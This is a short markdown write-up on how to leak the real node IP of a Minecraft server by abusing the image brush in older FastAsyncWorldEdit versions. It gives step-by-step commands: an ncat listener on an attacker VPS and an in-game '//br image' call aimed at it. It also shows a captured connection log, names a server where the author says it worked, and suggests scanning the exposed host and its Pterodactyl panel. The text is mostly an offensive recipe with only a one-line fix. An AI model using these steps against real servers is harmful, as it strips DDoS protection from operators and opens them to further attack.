Skip to content

FastAsyncWorldEdit.md

Latest commit

 

History

History
40 lines (31 loc) · 1.41 KB

FastAsyncWorldEdit.md

File metadata and controls

40 lines (31 loc) · 1.41 KB

FastAsyncWorldEdit (FAWE) getting node IP method.

Overview

FAWE is a plugin made for faster world editing (faster WorldEdit).

Analysis

FAWE has an option for importing images into your world. This could be exploited in old versions. I don't know from what version it got patched.

//br image https://i.imgur.com/EQnxJL1_d.png 20
           (URL)                             (Radius)

Exploiting

We need a VPS server or a server that can receive connections from anywhere in the world. In this case I'm going to use a VPS. (port) = A number from 1-65535. (server_ip) = The vps' IP.

VPS-SIDE:

  1. We need to install ncat on our VPS.
    • apt-get install ncat
  2. Then we listen for connections.
    • ncat -lnvp (port)

ATTACK-SIDE:

  1. Easy. Run a load image process but with our information.
    • //br image (server_ip):(port) 20

We will then get an output like this:

Ncat: Connection from 212.192.29.22.
Ncat: Connection from 212.192.29.22:37100.

Prevention

Update FastAsyncWorldEdit to the latest versions.

What we can do with the IP?

  • Scan the server in case we can get more information, such as Pterodactyl domain which we can expose whole server nodes/get the panel.
  • If we are in the situation that we just get into a Build Server through a TCPShield' server. Pinger sometimes is installed for no reason so we can just send the message in chat and wait. This happened to me in Hycraft.